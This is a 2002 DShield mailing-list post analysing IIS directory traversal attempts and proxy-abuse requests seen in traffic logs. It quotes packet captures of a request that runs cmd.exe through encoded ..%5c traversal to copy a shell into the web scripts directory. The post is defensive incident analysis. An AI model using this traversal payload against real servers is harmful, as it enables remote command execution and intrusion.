[Dshield] Re: New IIS directory traversal worm, or just a tool sig?

James C Slora Jr Jim.Slora at phra.com
Fri Nov 8 17:02:26 GMT 2002


"BarkerJr" wrote Thu, 7 Nov 2002 16:04:10 -0500
> Gets actually specifying a server hostname are proxy checks, I
> believe.  My guess is that someone is trying to make web server/proxies
> hack into a government web server.

I'm referring to the "Host" header field, specifically.
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14

The host name specified in an HTTP GET is used to specify the virtual host
on an IP address that could host more than one web. In the standard attacks
and worms it is normally just useless window dressing because they are
attacking the host of the default web on the target IP. IIS will ignore the
Host header field if there are no virtual hosts, and will serve the request
from the default web instead. Web server logs will not necessarily show the
host name specified in the GET because it is irrelevant for many purposes.
Packet captures will show the host name, though.

- Code Red uses www.worm.com in the "Host" header field
- Nimda uses "www" in the "Host" header field
- sfind and derivatives typically use the target's IP address in the "Host"
header field
- The "new" attempt to copy a shell to the scripts directory uses
"ww.tk.gov" in the "Host" header field.

ww.tk.gov is a nonexistent host in a nonexistent domain, so I think this
host name is just some sort of statement by the tool's author. It has no
effect on the GET request - the attack is against the system that receives
the GET, rather than a proxy attack on another server. These attempts
started just after the Turkish elections, so maybe there is some sort of
real or fake political connection.

The directory traversal requests I'm seeing look like this (two packets in
the attempt):

11/06/02-20:26:11.335063 65.93.29.79:4083 -> notavictim.net:80
TCP TTL:109 TOS:0x0 ID:22837 IpLen:20 DgmLen:164 DF
***AP*** Seq: 0xEFA00A9  Ack: 0xBE12FDC7  Win: 0x2124  TcpLen: 20
0x0030: 21 24 AB 72 00 00 47 45 54 20 2F 73 63 72 69 70  !$.r..GET /scrip
0x0040: 74 73 2F 2E 2E 25 35 63 2E 2E 25 35 63 77 69 6E  ts/..%5c..%5cwin
0x0050: 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E  nt/system32/cmd.
0x0060: 65 78 65 3F 2F 63 2B 63 6F 70 79 2B 63 3A 5C 77  exe?/c+copy+c:\w
0x0070: 69 6E 6E 74 5C 73 79 73 74 65 6D 33 32 5C 63 6D  innt\system32\cm
0x0080: 64 2E 65 78 65 2B 63 3A 5C 69 6E 65 74 70 75 62  d.exe+c:\inetpub
0x0090: 5C 73 63 72 69 70 74 73 5C 73 63 72 69 70 74 2E  \scripts\script.
0x00A0: 65 78 65 20 48 54 54 50 2F 31 2E 31 0D 0A 2E 31  exe HTTP/1.1...1
0x00B0: 0D 0A                                            ..

11/06/02-20:26:11.606866 65.93.29.79:4083 -> notavictim.net:80
TCP TTL:109 TOS:0x0 ID:27701 IpLen:20 DgmLen:72 DF
***AP*** Seq: 0xEFA0125  Ack: 0xBE12FDC7  Win: 0x2124  TcpLen: 20
0x0030: 21 24 B5 B3 00 00 41 63 63 65 70 74 3A 20 2A 2F  !$....Accept: */
0x0040: 2A 0D 0A 48 6F 73 74 3A 20 77 77 2E 74 6B 2E 67  *..Host: ww.tk.g
0x0050: 6F 76 0D 0A 0D 0A                                ov....

An attempt by a spammer to GET proxy to another host looks like this:

11/08/02-06:20:17.255774 210.117.151.172:2086 -> myhost:80 TCP
TTL:110 TOS:0x0 ID:14158 IpLen:20 DgmLen:88 DF
***AP*** Seq: 0xA6983430  Ack: 0x566FF5AE  Win: 0x4470  TcpLen: 20
0x0030: 44 70 D6 79 00 00 47 45 54 20 68 74 74 70 3A 2F  Dp.y..GET http:/
0x0040: 2F 6D 61 69 6C 2E 79 61 68 6F 6F 2E 63 6F 6D 2F  /mail.yahoo.com/
0x0050: 3F 2E 69 6E 74 6C 3D 75 73 20 48 54 54 50 2F 31  ?.intl=us HTTP/1
0x0060: 2E 30 0D 0A 0D 0A                                .0....

This proxy attempt does not use the Host field. Host is a required GET
header field, but apparently some web servers don't care. Proxying can also
be done through an HTTP CONNECT.




More information about the list mailing list